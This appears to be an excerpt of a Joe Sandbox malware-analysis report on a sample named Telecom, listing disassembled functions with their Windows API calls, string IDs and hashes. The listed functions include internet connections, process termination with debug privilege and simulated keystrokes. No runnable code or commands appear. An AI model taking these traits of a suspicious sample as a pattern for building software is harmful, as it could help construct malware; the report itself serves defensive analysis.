                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                      • String ID:
                                                      • API String ID: 3113390036-3916222277
                                                      • Opcode ID: 9fd12605c53f99648a932719c45fd63a9a90b1a8e2ffef11e2c7fdb845688254
                                                      • Instruction ID: b219ca33ea2c9007dd78d22bfcfc4af749d88f4c68a41b120b8f6551e29b284e
                                                      • Opcode Fuzzy Hash: 9fd12605c53f99648a932719c45fd63a9a90b1a8e2ffef11e2c7fdb845688254
                                                      • Instruction Fuzzy Hash: 48316DB9A01204AFD721AF658CC8AEB7BFCEB45744B10456FF446D3200DB38D9059BB9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004855AE,?,?,Bad directive syntax error,004DDCD0,00000000,00000010,?,?), ref: 004AA236
                                                      • LoadStringW.USER32(00000000,?,004855AE,?), ref: 004AA23D
                                                        • Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333
                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 004AA301
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                      • API String ID: 858772685-4153970271
                                                      • Opcode ID: 17f61539838ea4a974c3a05b387218bdc0eb6c315939244c06abd579727f5ff3
                                                      • Instruction ID: fc96cf0d7e8a964b8e2009a06ff8392c84bb0ac1463c93c6709bf218d91839ac
                                                      • Opcode Fuzzy Hash: 17f61539838ea4a974c3a05b387218bdc0eb6c315939244c06abd579727f5ff3
                                                      • Instruction Fuzzy Hash: 63216172C0021DEBDF02AF90CC06EEE7B35FF18704F04446BB515651A2E779A528DB55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetParent.USER32 ref: 004A29F8
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 004A2A0D
                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004A2A9A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameParentSend
                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                      • API String ID: 1290815626-3381328864
                                                      • Opcode ID: 980b9b76c71733d98c22e116e7440e3e2be683df4d996eafa5ac81cb40d5a700
                                                      • Instruction ID: 4ab39f927c6ce65da6a8f386f627cd4e3fafc9d017d946b2852053aeb4fa2b48
                                                      • Opcode Fuzzy Hash: 980b9b76c71733d98c22e116e7440e3e2be683df4d996eafa5ac81cb40d5a700
                                                      • Instruction Fuzzy Hash: F71129B6644307B9FA246229DD07DAB3B9CDF26728B200027F905E40D1FBEDA811655D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetClientRect.USER32(?,?), ref: 0044758D
                                                      • GetWindowRect.USER32(?,?), ref: 004475CE
                                                      • ScreenToClient.USER32(?,?), ref: 004475F6
                                                      • GetClientRect.USER32(?,?), ref: 0044773A
                                                      • GetWindowRect.USER32(?,?), ref: 0044775B
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Rect$Client$Window$Screen
                                                      • String ID:
                                                      • API String ID: 1296646539-0
                                                      • Opcode ID: d06989d9743e57ca49bcdab467242918275cd13073dc26088b99b8c9e6f3958e
                                                      • Instruction ID: bbfadcb80422430a641a939acfeb3a1f73ff84a5f10ae12adbce347be35b0e98
                                                      • Opcode Fuzzy Hash: d06989d9743e57ca49bcdab467242918275cd13073dc26088b99b8c9e6f3958e
                                                      • Instruction Fuzzy Hash: 0FC18E3490464AEFEB10DFA8C540BEEB7F1FF08310F15841AE895A7350D738A942DB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                      • String ID:
                                                      • API String ID: 1282221369-0
                                                      • Opcode ID: f896c173682fe0afc75500361a46a2793606e9fa88e346f2f8eefbea24f4566b
                                                      • Instruction ID: 40bf844ea0104775031ecdee5a0137c0f0e5b63a4eb0df5037cc5e54950773ac
                                                      • Opcode Fuzzy Hash: f896c173682fe0afc75500361a46a2793606e9fa88e346f2f8eefbea24f4566b
                                                      • Instruction Fuzzy Hash: 32611571D14300AFDB21AF65E9416EB7BB49F01324F04C1AFE94CA7286EA7D98018699
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004BCBC7
                                                      • GetLastError.KERNEL32 ref: 004BCBDA
                                                      • SetEvent.KERNEL32(?), ref: 004BCBEE
                                                        • Part of subcall function 004BCC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004BCCB7
                                                        • Part of subcall function 004BCC98: GetLastError.KERNEL32 ref: 004BCD67
                                                        • Part of subcall function 004BCC98: SetEvent.KERNEL32(?), ref: 004BCD7B
                                                        • Part of subcall function 004BCC98: InternetCloseHandle.WININET(00000000), ref: 004BCD86
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                      • String ID:
                                                      • API String ID: 337547030-0
                                                      • Opcode ID: 4cbf76951f0a80e53d11ecc7d207d835be34c55579352e8480b9f17078709cf2
                                                      • Instruction ID: 36bc8d518d44b465e75652bebe02dd00651e0c7d66c16e72bdf00051bc72c2a2
                                                      • Opcode Fuzzy Hash: 4cbf76951f0a80e53d11ecc7d207d835be34c55579352e8480b9f17078709cf2
                                                      • Instruction Fuzzy Hash: C8318B71A01701AFDB219F65CDC4ABBBBB8FF54304B00452FF85A82610C739E815ABB8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 004A4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 004A43AD
                                                        • Part of subcall function 004A4393: GetCurrentThreadId.KERNEL32 ref: 004A43B4
                                                        • Part of subcall function 004A4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004A2F00), ref: 004A43BB
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 004A2F0A
                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004A2F28
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 004A2F2C
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 004A2F36
                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004A2F4E
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 004A2F52
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 004A2F5C
                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004A2F70
                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 004A2F74
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                      • String ID:
                                                      • API String ID: 2014098862-0
                                                      • Opcode ID: ca0c68bb4c9f667b4a0da7738f8944598f7d0078e4364f8cd18d65251f4c50d8
                                                      • Instruction ID: 292e1393a0516d9f9b7c82e7b1b6d7cf0170ad60fb1e7fa5b2d6e51a660566eb
                                                      • Opcode Fuzzy Hash: ca0c68bb4c9f667b4a0da7738f8944598f7d0078e4364f8cd18d65251f4c50d8
                                                      • Instruction Fuzzy Hash: 0501D430B84610BBFB1067699C8AF593F5ADB9EB11F100027F318AE1E4C9E664449AAD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,004A1D95,?,?,00000000), ref: 004A2159
                                                      • HeapAlloc.KERNEL32(00000000,?,004A1D95,?,?,00000000), ref: 004A2160
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004A1D95,?,?,00000000), ref: 004A2175
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,004A1D95,?,?,00000000), ref: 004A217D
                                                      • DuplicateHandle.KERNEL32(00000000,?,004A1D95,?,?,00000000), ref: 004A2180
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004A1D95,?,?,00000000), ref: 004A2190
                                                      • GetCurrentProcess.KERNEL32(004A1D95,00000000,?,004A1D95,?,?,00000000), ref: 004A2198
                                                      • DuplicateHandle.KERNEL32(00000000,?,004A1D95,?,?,00000000), ref: 004A219B
                                                      • CreateThread.KERNEL32(00000000,00000000,004A21C1,00000000,00000000,00000000), ref: 004A21B5
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                      • String ID:
                                                      • API String ID: 1957940570-0
                                                      • Opcode ID: 2688b9eb12e33e1cc2cb80ae86906ef67430b3697b230e328492abaa36d7346e
                                                      • Instruction ID: a86858cd779bdfa345616d63e32816920075b40f01d9081a7a55eea9fd9baa52
                                                      • Opcode Fuzzy Hash: 2688b9eb12e33e1cc2cb80ae86906ef67430b3697b230e328492abaa36d7346e
                                                      • Instruction Fuzzy Hash: 9701BBB5641304BFE710AFA5DC4DF6B7BACEB89711F004422FA05DB1A1CA749C00CB24
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 004441EA: _wcslen.LIBCMT ref: 004441EF
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004ACF99
                                                      • _wcslen.LIBCMT ref: 004ACFE0
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004AD047
                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004AD075
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                      • String ID: ,*Q$0$<*Q
                                                      • API String ID: 1227352736-602050549
                                                      • Opcode ID: 6317bb8cfc9b303eafeea018ee10c40bb129d4d4d8380df0f043de1156cc0193
                                                      • Instruction ID: 723ed35c8b782915bc68914c4eebc6445ccda6859201fc97fe03645c0b4e9670
                                                      • Opcode Fuzzy Hash: 6317bb8cfc9b303eafeea018ee10c40bb129d4d4d8380df0f043de1156cc0193
                                                      • Instruction Fuzzy Hash: 1D51D471A083009FE7149F29C885BAB77E8AF66318F040A2FF592D32D0DB78C945875A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 004ADD87: CreateToolhelp32Snapshot.KERNEL32 ref: 004ADDAC
                                                        • Part of subcall function 004ADD87: Process32FirstW.KERNEL32(00000000,?), ref: 004ADDBA
                                                        • Part of subcall function 004ADD87: FindCloseChangeNotification.KERNEL32(00000000), ref: 004ADE87
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004CABCA
                                                      • GetLastError.KERNEL32 ref: 004CABDD
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004CAC10
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 004CACC5
                                                      • GetLastError.KERNEL32(00000000), ref: 004CACD0
                                                      • CloseHandle.KERNEL32(00000000), ref: 004CAD21
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 1701285019-2896544425
                                                      • Opcode ID: 211e9bd70636984ffc3375d9fa5bc22bb577c7516a3160c524915679a14df9ff
                                                      • Instruction ID: 722fb5f3075ae28b5119da0978d705171add6f057047039db7e83ca474f0b5bb
                                                      • Opcode Fuzzy Hash: 211e9bd70636984ffc3375d9fa5bc22bb577c7516a3160c524915679a14df9ff
                                                      • Instruction Fuzzy Hash: C861C1782042459FE350DF15C484F2ABBE1AF5430CF14849EE4668BBA3C779EC55CB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004D43C1
                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004D43D6
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004D43F0
                                                      • _wcslen.LIBCMT ref: 004D4435
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 004D4462
                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 004D4490
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcslen
                                                      • String ID: SysListView32
                                                      • API String ID: 2147712094-78025650
                                                      • Opcode ID: 7129a81e83db62e329e32d0862de26387ee7648c7cecb6db5015e29d6e57f40c
                                                      • Instruction ID: b87bbb350cf22508c66960aa21f8e18b7ccedf0ea367d5d249f7e9ca10c1fc55
                                                      • Opcode Fuzzy Hash: 7129a81e83db62e329e32d0862de26387ee7648c7cecb6db5015e29d6e57f40c
                                                      • Instruction Fuzzy Hash: 6D41AF71A00319ABDB219F64CC49BEB7BA9FB48350F10012BF944E7391D7789990DB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004AC6C4
                                                      • IsMenu.USER32(00000000), ref: 004AC6E4
                                                      • CreatePopupMenu.USER32 ref: 004AC71A
                                                      • GetMenuItemCount.USER32(01495B28), ref: 004AC76B
                                                      • InsertMenuItemW.USER32(01495B28,?,00000001,00000030), ref: 004AC793
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                      • String ID: 0$2
                                                      • API String ID: 93392585-3793063076
                                                      • Opcode ID: 6435ca575228c6bc3e5f26dbb02e52883e5fb127598e352c18a44ed306e58c59
                                                      • Instruction ID: de4860404353ae721a46effe4227296856364302082177f3c4b9fde3861e59ba
                                                      • Opcode Fuzzy Hash: 6435ca575228c6bc3e5f26dbb02e52883e5fb127598e352c18a44ed306e58c59
                                                      • Instruction Fuzzy Hash: 5D51C274A00206EBDF50CF68D9C4BAEBBF4AF6A314F24412BE41297390D7789941CF59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004D8740
                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 004D8765
                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 004D877D
                                                      • GetSystemMetrics.USER32(00000004), ref: 004D87A6
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,004BC1F2,00000000), ref: 004D87C6
                                                        • Part of subcall function 0044249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004424B0
                                                      • GetSystemMetrics.USER32(00000004), ref: 004D87B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$MetricsSystem
                                                      • String ID: (Q
                                                      • API String ID: 2294984445-2768264020
                                                      • Opcode ID: b775cfa711ef53243b3c99b62d5b8b9c5f7ecefddcfebc6bbc878658d8f239d8
                                                      • Instruction ID: 383770a9b80c7336fbc2722063db0219c934f743b59db9f98e63666c5ae6178c
                                                      • Opcode Fuzzy Hash: b775cfa711ef53243b3c99b62d5b8b9c5f7ecefddcfebc6bbc878658d8f239d8
                                                      • Instruction Fuzzy Hash: 64218C71A11251EFCB149F38CC18A7B3BA5EB84325F25462FF926C23E0EA349850DB18
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadIconW.USER32(00000000,00007F03), ref: 004AD1BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2457776203-404129466
                                                      • Opcode ID: eec309531eb26ace0dc2d1173e2c29cd22087414684bb56096b078517b15854a
                                                      • Instruction ID: 3615672a385fe8892a865c54b209fded27e2869e43878104bf9893db5a1b4cf6
                                                      • Opcode Fuzzy Hash: eec309531eb26ace0dc2d1173e2c29cd22087414684bb56096b078517b15854a
                                                      • Instruction Fuzzy Hash: 9311DD35E4C30ABAE7055B55DC82DAF7B9CDF2A764B10002BF502A66C1EBBC6A41416E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                      • String ID: 0.0.0.0
                                                      • API String ID: 642191829-3771769585
                                                      • Opcode ID: 1152e0f494c9d28196ecfd31023038d66aa35dfb8da76f712bda274e6258ef58
                                                      • Instruction ID: cb2c304e4aa1932df1636d7340fff6df5206b2d4ee6dc366620357245cf1f553
                                                      • Opcode Fuzzy Hash: 1152e0f494c9d28196ecfd31023038d66aa35dfb8da76f712bda274e6258ef58
                                                      • Instruction Fuzzy Hash: E6112431900114BBCB20BB32DC4AEDE37ACEF52714F0000BBF511A2191FE788A81D669
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit
                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 2610073882-625585964
